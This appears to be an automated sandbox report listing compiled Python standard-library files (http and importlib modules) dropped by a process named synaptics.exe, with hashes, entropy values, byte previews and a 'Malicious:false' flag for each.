                                                                                                                                                                                                                Preview:o........{-d.........................@...s&...d.d.l.m.Z...d.g.Z.G.d.d...d.e...Z.d.S.)......)...IntEnum..HTTPStatusc....................@...s....e.Z.d.Z.d.Z.dDd.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCS.)Er....aG...HTTP status codes and reason phrases.. Status codes from the following RFCs are all observed:.. * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616. * RFC 6585: Additional HTTP Status Codes. * RFC 3229: Delta encoding in HTTP. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518. * RFC 5842: Binding Extensions to WebDAV. * RFC 7238: Permanent Redirect. * RFC 2295: Transparent Content Negotiation in HTTP. * RFC 2774: An HTTP Extension Framework. * RFC 7725: An HTTP Status Code to Rep
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):35188
                                                                                                                                                                                                                Entropy (8bit):5.3794640356404155
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:9oG3sy3gu5p4T9uaP5OvX/6aHpq//oUyt2iGYS9uj8Eqds:mG3rgu5p4T9u25OvX/6aHpg/gt2iGYSo
                                                                                                                                                                                                                MD5:BF164778572524D07A86E5BEFCF01B90
                                                                                                                                                                                                                SHA1:F6971F13DB113BBCF842E49E01D32277067A69F8
                                                                                                                                                                                                                SHA-256:25F5386F3C011D4FD7E2517935954722E6BCF4BE2CAA37AD64A8D532A85369BD
                                                                                                                                                                                                                SHA-512:CE4275D9332539C4037E4D92B799988613FA5750ACA17493632D49C0A0EB560651E4E8A14572D23EE425468599B3314489F0EA41BE6768E705DE76A40C60ED8D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sP...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.....e.j.j.....d.d...e.j.j.....D...Z.d.Z.d.Z.e...d...j.Z.e...d...j Z!e...d...Z"e...d...Z#h.d...Z$d?d.d...Z%G.d.d...d.e.j&j'..Z(d.d...Z)e(f.d.d...Z*G.d.d...d.e.j+..Z,G.d.d ..d ..Z-z.d.d.l.Z.W.n...e/y.......Y.n.w.G.d!d"..d"e-..Z0e..1d"....G.d#d$..d$e2..Z3G.d%d&..d&e3..Z4G.d'd(..d(e3..Z5G.d)d*..d*e3..Z6G.d+d,..d,e3..Z7G.d-d...d.e3..Z8G.d/d0..d0e3..Z9G.d1d2..d2e3..Z:G.d3d4..d4e:..Z;G.d5d6..d6e:..Z<G.d7d8..d8e:..Z=G.d9d:..d:e3..Z>G.d;d<..d<e3..Z?G.d=d>..d>e@e>..ZAe3ZBd.S.)@a....HTTP/1.1 client library..<intro stuff goes here>.<other stuff, too>..HTTPConnection goes through a number of "states", which define when a client.may legally make another request or fetch the response for a particular.request. This diagram details these state transitions:.. (null). |. | HTTPConnection(). v. Idle. |. | putr
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):53450
                                                                                                                                                                                                                Entropy (8bit):5.560787749907612
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:eB65TRGXx0wM1oyXc63+dpUTXcc5he57HfAqZ8K20oERqRGwFkEu58kvknKdVWV6:bAI1FXZ+bUQ8hlER6dg6hMT
                                                                                                                                                                                                                MD5:3F6B6B754FFB27C7096E52261A8D8A22
                                                                                                                                                                                                                SHA1:89B5275AA3FE74330C43379CD8EB19DD7CAB33A3
                                                                                                                                                                                                                SHA-256:598450FC0FE78DD97E6DAAFD8523C3F7900BB281971932B1C7511488FD77AFC2
                                                                                                                                                                                                                SHA-512:C970F83259F335F774424960CD17F51CF5DE5F78D14504360B7AE9FCCD9B2BDDB7F12F7ADF3D8A868221071F3AF9D81B322F13277FA1FC0FC4400B3E1C860416
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.6.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d.d...Z.d.Z.d.Z.e.e.j.j...Z.e...d...Z.d.Z.d.Z.d.d...Z.d.Z.d.d...Z.g.d...Z g.d...Z!g.Z"e!D.].Z#e".$e#.%......qadid.d...Z&did.d...Z'd.d.d.d.d...Z(e...d.e.j)..Z*d.d...Z+d.d...Z,e...d.e.j)..Z-e...d.e.j.e.j)B...Z/e...d e.j0e.j)B...Z1d!d"..Z2e...d#e.j0e.j)B...Z3d$d%..Z4d&d'..Z5e...d(..Z6e...d)..Z7e...d*..Z8e...d+..Z9d,d-..Z:e...d...Z;d/d0..Z<d1d2..Z=d3d4..Z>e...d5e.j)..Z?d6d7..Z@d8d9..ZAd:d;..ZBd<d=..ZCe...d>e.j)..ZDd?d@..ZEdAdB..ZFdCdD..ZGdEdF..ZHdGZIe...dH..ZJdIdJ..ZKdKdL..ZLdMdN..ZMdOdP..ZNG.dQdR..dR..ZOG.dSdT..dT..ZPG.dUdV..dVeP..ZQdWdX..ZRdYdZ..ZSG.d[d\..d\..ZTG.d]d^..d^..ZUG.d_d`..d`eV..ZWG.dadb..dbeU..ZXdcdd..ZYG.dedf..dfeX..ZZG.dgdh..dheX..Z[d.S.)ja....HTTP cookie handling for web clients...This module has (now fairly distant) origins in Gisle Aas' Perl module.HTTP::Cookies, from the libwww-perl library...Docstrings, comments and debug
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15348
                                                                                                                                                                                                                Entropy (8bit):5.445136626158563
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:nT6ZJt/SHD+IfhNGV10wqP+6JdMYFGBCeA4Gm0Ir7bDQs61vwOQY2jxP+Qh3lL44:TWJtS+Ifh8D0wqP+6JdMYsBrA4GmzfbX
                                                                                                                                                                                                                MD5:699C2DC20D5C401640BCC32CC643B6AD
                                                                                                                                                                                                                SHA1:81715F2ACEA3814A1D7F4B61EFF46AC6F22E3FA3
                                                                                                                                                                                                                SHA-256:3D236630D3B0281778487CB59E3A058AED48BC64675ED86EBA885FDE72E7DB28
                                                                                                                                                                                                                SHA-512:F405C7926BFC726AAFEEC516AE63D528602D791F843A9F61EA9EA322B0806F85B89AEE7007468B9515D241A50B038AF3912B03243D9A75D8F8987747580604A6
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dfR.......................@...sZ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.j.Z.d.j.Z.d.j.Z.G.d.d...d.e...Z.e.j.e.j...d...Z.e.d...Z.d.d...e.e.d.....e.e.e.e.......D...Z.e...e.d...d.e.d...d.i.....e...d.e...e.......j.Z.d.d...Z.e...d...Z.e...d...Z.d.d...Z.g.d...Z.g.d...Z.d.e.e.f.d.d...Z.G.d.d...d.e ..Z!d.Z"e"d ..Z#e...d!e"..d"..e#..d#..e.j$e.j%B...Z&G.d$d%..d%e ..Z'G.d&d'..d'e'..Z(d.S.)(a.....Here's a sample session to show how to use this module..At the moment, this is the only documentation...The Basics.----------..Importing is easy..... >>> from http import cookies..Most of the time you start by creating a cookie... >>> C = cookies.SimpleCookie()..Once you've created your Cookie, you can add values just as if it were.a dictionary... >>> C = cookies.SimpleCookie(). >>> C["fig"] = "newton". >>> C["sugar"] = "wafer". >>> C.output(). 'Set-Cookie: fig=newton\r\nSet-Cookie: sugar=wafer'..Notice that the printable representation of a Cookie is the.appropriate format for a
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3815
                                                                                                                                                                                                                Entropy (8bit):5.535064732221013
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:euKEn4Gs1xwkB8EpIXEz66QncxK1p9W0j+VZzmF2Q8yIcOr:UEkroMK1a0j+DmF2QZIh
                                                                                                                                                                                                                MD5:F42503F1E54134E36C24CC25A16B6641
                                                                                                                                                                                                                SHA1:8861ADD86C519CF82FA42F8EF4C44CAFCA1FC9C4
                                                                                                                                                                                                                SHA-256:6F411D7DBD2D5913377E62A7C034C13115DFD13384D4B0FE21CCE36FE5F6D73D
                                                                                                                                                                                                                SHA-512:F2C67B0C01D1721BC7CF84E56279F31E041E1B2F40E3D36053945624A8F84AE550605BA2736515523173A10B6BADA966CEBA43C23AF545E14E56AE66365FDC34
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dy........................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y)......d.d.l.m.Z...e...e.e.....Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.yB......Y.n.w.e.e.j.d.<.z.d.d.l.Z.W.n...e.ye......d.d.l.m.Z...e...e.....e.e._.Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.y~......Y.n.w.e.e.j.d.<.e.j.Z.e.j.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.i.Z.d.d...Z.d.S.).z'A pure Python implementation of import.)...__import__..import_module..invalidate_caches..reload.....N.....)..._bootstrapz.importlib._bootstrap..importlibz.__init__.pyz._bootstrap.py)..._bootstrap_externalz.importlib._bootstrap_externalz._bootstrap_external.py).r....c....................C...s"...t.j.D.].}.t.|.d...r.|.......q.d.S.).zmCall the invalidate_caches() method on all meta path finders stored in. sys.meta_path (where implemented).r....N)...sys..meta_path..hasattrr....)...finder..r.....3C:\Users\user\Desktop\tmp\lib\importlib\__init__.pyr....A...s..............r....c....................C...s....
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1981
                                                                                                                                                                                                                Entropy (8bit):5.008316035682812
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:6GYO7KXEXsRXrqj9FXHRLSVRibTAsKhnsRyy:QrEXiXrqhFXHPTbIsZ
                                                                                                                                                                                                                MD5:16A1319C19E007A2AF08879662304E0B
                                                                                                                                                                                                                SHA1:8F762C37EC251C0D2C2FB24D5F2E2C7AD7DC1373
                                                                                                                                                                                                                SHA-256:2F828EE7688A63966D90485D25E5B64286BA3D48658BA526CAAB9013C8501BE2
                                                                                                                                                                                                                SHA-512:3852A2DACC7DACC61097E8698918D6777267865D6004650D74AC9E2D85B6F69AE1609327CB901C6B77391C5FF3CF584F3134BFDAAF62FE9AA8B927DF94CED3A9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dr........................@...s8...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.G.d.d...d.e.j.d...Z.d.S.).z>Subset of importlib.abc used to reduce importlib.util imports......)..._bootstrap.....Nc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...Loaderz'Abstract base class for import loaders.c....................C...s....d.S.).z.Return a module to initialize and into which to load... This method should raise ImportError if anything prevents it. from creating a new module. It may return None to indicate. that the spec should create the new module.. N..)...self..specr....r...../C:\Users\user\Desktop\tmp\lib\importlib\_abc.py..create_module....s......z.Loader.create_modulec....................C...s....t.|.d...s.t...t...|.|...S.).a....Return the loaded module... The module must be added to sys.modules and have import-related. attributes set properly. The fullname is a str... ImportError is raised on failure... T
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3713
                                                                                                                                                                                                                Entropy (8bit):4.656884172789373
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:KdiChyWa11p/5cIBqNU79FhTEnKIgVFKOmuD79VsUKyO9WoK/UML9Qa:yhyWGfxxB99FhkKIgDKONrsUK39WoK/L
                                                                                                                                                                                                                MD5:C479E9E8FC8EBDAAF24029DF651DA3FC
                                                                                                                                                                                                                SHA1:5955C550BB849D6AD66C752007915E03C1EFA651
                                                                                                                                                                                                                SHA-256:B63110EBE408E846AB2D5CB9F056F91FA0C38F5088D9E870DC7E0B3C7F64BF38
                                                                                                                                                                                                                SHA-512:68A78245EF93F1A72AC0B65380852EC54581058A26D50F3E8EA4A40FA93F0A80194600585594B1214112E209D36E898B6813F55C97DCE2E236A8B1ED780A168A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sN...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.S.)......)...suppress.....)...abcc....................@...s(...e.Z.d.Z.d.Z.d.d...f.d.d...Z.d.d...Z.d.S.)...SpecLoaderAdapterz>. Adapt a package spec to adapt the underlying loader.. c....................C...s....|.j.S...N)...loader....spec..r.....4C:\Users\user\Desktop\tmp\lib\importlib\_adapters.py..<lambda>....s......z.SpecLoaderAdapter.<lambda>c....................C...s....|.|._.|.|...|._.d.S.r....).r....r....)...selfr....Z.adapterr....r....r......__init__....s........z.SpecLoaderAdapter.__init__c....................C........t.|.j.|...S.r....)...getattrr......r......namer....r....r......__getattr__...........z.SpecLoaderAdapter.__getattr__N)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............r....c....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.)...TraversableResourcesLoaderz9. Adapt a loader to
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2977
                                                                                                                                                                                                                Entropy (8bit):5.1886772680175985
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:QfiZ38jH+kP4PY+IuYalBABDu0ZLmJ2SOoHft3XlY2s03f/mm2vJviUeXrowab:QfipsH3AfYali7ZL7dillY2s033mm2vX
                                                                                                                                                                                                                MD5:A061DB534DFC42C432D077E4D5584515
                                                                                                                                                                                                                SHA1:43A5056A9237C7A366ADD9FE52E5CDDFFF68E6DA
                                                                                                                                                                                                                SHA-256:851799797900928C5B00D8B5C52989E7A062072737092704F3E7CA7B33D4FA7B
                                                                                                                                                                                                                SHA-512:7CE64D3DB81D5A8604EE06DB73612AAD7C10828BF5F04822F55C492BB474C5173ACE96FDD8F05D01D1B3E7BCF76D75FFFFECB609CD759673B4040F7FA9EA68C3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.j.e.f...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.d.e.j.d...d.d.....Z.e.j.d.d.....Z.e...e.j...e.j.d.d.......Z d.S.)......N)...Union..Any..Optional.....)...ResourceReader..Traversable)...wrap_specc....................C...s....t.t.|.....S.).z3. Get a Traversable resource from a package. )...from_package..get_package)...package..r.....2C:\Users\user\Desktop\tmp\lib\importlib\_common.py..files....s......r....c....................C...s....t.|...}.t.j...|...\.}.}.|.r.t.|...d.......|.S.).z.Normalize a path by ensuring it is a string... If the resulting string contains path separators, an exception is raised.. z. must be only a file name)...str..os..path..split..ValueError).r....Z.str_path..parent..file_namer....r....r......normalize_path....s..............r....c....................C...s*...|.j.}.t.|.j.d.d...}.|.d.u.r.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15901
                                                                                                                                                                                                                Entropy (8bit):5.105790994792609
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:4ziB5HGaViuYo8vEVbFCibM/50LbCb1EVMXS6O9PzXDPJ8OoEAuDdPTaX/DOWP6s:4yDVnR8gC/50LbjVMA9PrWCDaX/P6s
                                                                                                                                                                                                                MD5:B4FA0F9E9A801AEFB4FAE9B7F582812E
                                                                                                                                                                                                                SHA1:814D7C53C4D7C36B18D3A58D841A017FB75C3C32
                                                                                                                                                                                                                SHA-256:1C28343531B44296AB19DE3B66DDB887651AAEF4B6FA59065D9B04C76CA55AF3
                                                                                                                                                                                                                SHA-512:749D80674774AF6BD50D7B23D983EE183E7C812C59AD73AD328BC5FE4B1B98A11DDDF6384F5CCCAF86B819F931FCDF9790F2EA7EAC98C7CA8EF40A0720051214
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.:.......................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.y...Z...z.e.j.d.k.r"..d.Z.W.Y.d.Z.[.n.d.Z.[.w.w.z.d.d.l.Z.W.n...e.y@......e.Z.Y.n.w.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d...Z.G.d.d...d.e.j.d...Z.G.d.d...d.e.j.d...Z.e.e.e.j.e.j.e.j.e.j.....G.d.d...d.e.j.d...Z.e.e.e.j.....G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.e.j.e.j.....G.d.d...d.e...Z.e.e.e.j ....G.d.d...d.e.j!e.e...Z!e.e!e.j"e.j#....G.d.d...d.e.j$e.e...Z$e.e$e.j"....G.d.d...d.e.j.d...Z%e.G.d.d ..d e.....Z&G.d!d"..d"e%..Z'd.S.)#z(Abstract base classes related to import......)..._bootstrap_external)...machinery.....N.._frozen_importlib)...Loader)...BinaryIO..Iterable..Text)...Protocol..runtime_checkablec....................G...sZ...|.D.](}.|...|.....t.d.u.r*z.t.t.|.j...}.W.n...t.y$......t.t.|.j...}.Y.n.w.|...|.....q.d.S...N)...registerr......getattr..__name__..AttributeError.._frozen_importlib_external).Z.abstract_clsZ.classes..clsZ.frozen_cls..r......C:\Users\user\D
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):954
                                                                                                                                                                                                                Entropy (8bit):5.389842259172301
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:CXCkBAzUYcjBN/8XHmE16iGMwigQFM4u0LIX7OujdiXg8G94EDRXqnrmHO28sVtP:IjoXT16iGMJgQFpAquj8GXdXsrmH58K
                                                                                                                                                                                                                MD5:7AEA91A48FDE64BBAF91AC9846300A21
                                                                                                                                                                                                                SHA1:10063270237445B125AFD960DA8603ACEC3F49F0
                                                                                                                                                                                                                SHA-256:0C747954CD230F3F3A086176C82DA332B7BF21BD3DF71D3B35C4632BD7969293
                                                                                                                                                                                                                SHA-512:AB3EB184578AF3BBDEF6CDB1E1208F4AE829874F62B6E6FED66FD018D4F0FD8A30265A76F05C913B72B4653A58DC9FECEB6F4512BC800549BA67B05FED8D4112
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dR........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.S.).z9The machinery of importlib: finders, loaders, hooks, etc......)...ModuleSpec)...BuiltinImporter)...FrozenImporter)...SOURCE_SUFFIXES..DEBUG_BYTECODE_SUFFIXES..OPTIMIZED_BYTECODE_SUFFIXES..BYTECODE_SUFFIXES..EXTENSION_SUFFIXES)...WindowsRegistryFinder)...PathFinder)...FileFinder)...SourceFileLoader)...SourcelessFileLoader)...ExtensionFileLoaderc....................C...s....t.t...t...S.).zAReturns a list of all recognized module suffixes for this process).r....r....r......r....r.....4C:\Users\user\Desktop\tmp\lib\importlib\machinery.py..all_suffixes....s......r....N)...__doc__.._bootstrapr....r....r......_bootstrap_externalr....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r......<module>....s............................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5192
                                                                                                                                                                                                                Entropy (8bit):4.8709695466155924
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:uPvdoTQ1zsquRgowzdmCbBavWMPTjTzKuhXBoPTl906kEt7IQ7ClEXsjMptAWrxB:pQ1ztyvedlbB7IruuhXBoPTlK9EhIQOi
                                                                                                                                                                                                                MD5:0DFDF7D5EBF6E0D157D89C2F533D2999
                                                                                                                                                                                                                SHA1:6BA06D0029CD91ABB7C3DE4EEC5FAFD3806A0C66
                                                                                                                                                                                                                SHA-256:324758BC73882153385466C11FCEB2070FA5728ED601C96ECB0586DDB307D75C
                                                                                                                                                                                                                SHA-512:F680F415585B33C917594892E0079CD23C76A73EFF5839FDC003A6339698F8188CF24C7B6F030ECAF0E53D9E1C35AD15A70419A4EF3E8417315A19E6BF5928DD
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d~........................@...sx...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.)......N.....)...abcc....................C...s....t.t.j...|.....S...N)...iter..collections..OrderedDict..fromkeys)...items..r.....2C:\Users\user\Desktop\tmp\lib\importlib\readers.py..remove_duplicates...........r....c....................@....$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...FileReaderc....................C...s....t...|.j...j.|._.d.S.r....)...pathlib..Path..path..parent)...self..loaderr....r....r......__init__....s......z.FileReader.__init__c....................C........t.|.j...|.....S...z{. Return the file system path to prevent. `resources.path()` from creating a temporary. copy.. ....strr......joinpath..r......resourcer....r....r......resource_path...........z.FileReader.resource_pathc....................C........|.j.S.r......r......r....r....r....r......files...........z.FileReader
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5379
                                                                                                                                                                                                                Entropy (8bit):5.335340779703262
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:UzYSudPIqJNGeMzW9dlfxV60JJgFGx6qjBfjO6y3SnKL49oNhbMrhKgTlv:UJBnS9xV6SJgGx6AjI3SKyhRTlv
                                                                                                                                                                                                                MD5:2C9C7F8B5B663C9F1CF2D7CFDAE9B5A3
                                                                                                                                                                                                                SHA1:EB1A4B2B39430ED49FFD3A022CC67D9ECD055A71
                                                                                                                                                                                                                SHA-256:0CE48D766DB5A7EEC41DDC460484245DC54FB35E90ED97D1E69A476BE7D961B5
                                                                                                                                                                                                                SHA-512:EDB65C51BDC383957005334364B6FC9A820747DFC0A37D67C6191B6C721FABFCD34C8F540BDB862A0D4202689A786D3376401EA9909679EA4C8DC1CEE4BF4556
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z e.e!e.f...Z"e.e!e.j#f...Z$d.e"d.e$d.e.f.d.d...Z%....d3d.e"d.e$d.e!d.e!d.e.f.d.d...Z&d.e"d.e$d.e'f.d.d...Z(....d3d.e"d.e$d.e!d.e!d.e!f.d.d ..Z)d.e"d.e$d.d!f.d"d#..Z*d$d%..Z+d&d'..Z,d(d)..Z-d.e"d*e!d.e.f.d+d,..Z/d.e"d.e.e!..f.d-d...Z0e.d/d0....Z1e1.2e...d1d2....Z3d.S.)4.....N.....)..._common)...as_file..files)...ResourceReader)...suppress)...ResourceLoader)...ModuleSpec)...BytesIO..TextIOWrapper)...Path)...ModuleType)...ContextManager..Iterable..Union)...cast)...BinaryIO..TextIO)...Sequence)...singledispatch)...Package..Resourcer....r......contentsr......is_resource..open_binary..open_text..path..read_binary..read_text..package..resource..returnc....................C...s&...t...|...}.t...|...}.t...|...}.|.d.u.r.|...|...S.t.t.|.j...}.|
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9339
                                                                                                                                                                                                                Entropy (8bit):5.315858225816917
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:/pt4ll1YVqQzvbab+Q3+LbcwE5lFz0w7/RhZT:Ril1YVqoeb+QuLbpmFz06RhZT
                                                                                                                                                                                                                MD5:302A96CC0F039B2B8FB2F62C95D5B163
                                                                                                                                                                                                                SHA1:FA6F3F1DB80FEA57E0A564DBD104B839B7B49E38
                                                                                                                                                                                                                SHA-256:BB884405644F2C0A1192F5505545177B6DAE306E9985BC231D87BBE1DA4D9697
                                                                                                                                                                                                                SHA-512:93AE92C835E7B036BDC5B98E6455AFC5A0EA03586E8EA5102E47120F901B0238CFF18C5B80BFC846906E358DF6122CF5778E24706A269208640829682AC970C6
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s*...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d$d.d...Z.d$d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z d.S.)%z-Utility code for constructing importers, etc......)...Loader)...module_from_spec)..._resolve_name)...spec_from_loader)..._find_spec)...MAGIC_NUMBER)..._RAW_MAGIC_NUMBER)...cache_from_source)...decode_source)...source_from_cache)...spec_from_file_location.....)...contextmanagerNc....................C...s....t...t.|...S.).zBReturn the hash of *source_bytes* as used in hash-based pyc files.)..._imp..source_hashr....)...source_bytes..r...../C:\Users\user\Desktop\tmp\lib\importlib\util.pyr........s......r....c....................C...s\...|...d...s.|.S.|.s.t.d.t.|.....d.......d.}.|.D.].}.|.d.k.r...n.|.d.7.}.q.t.|.|.d.....|.|...S.).z2Resolve a relativ
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):37106
                                                                                                                                                                                                                Entropy (8bit):5.210745039658831
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:KuMjZ3JEQWRwd2Aj+j5HlBqOVKpmtI5FugF0Mj:KucAL9BANHcgFRj
                                                                                                                                                                                                                MD5:0D019B8B6FC90267890C1DB17129A43D
                                                                                                                                                                                                                SHA1:EBBD6687FB52FD317D2F82789FF402ABA32D21C3
                                                                                                                                                                                                                SHA-256:F2F667F7C3B61A0419D6305D312E99848164F643314085E4804E942A9777072F
                                                                                                                                                                                                                SHA-512:74F8F460719A6ADF75AE7BB80AC13A8C52DFB2AB7A9E954440236393AA58F359200DCFFDAD552772AF36960583BF9EB970F572EA2362548608C2B8AD0EBBEB13
                                                                                                                                                                                                                Malicious:false
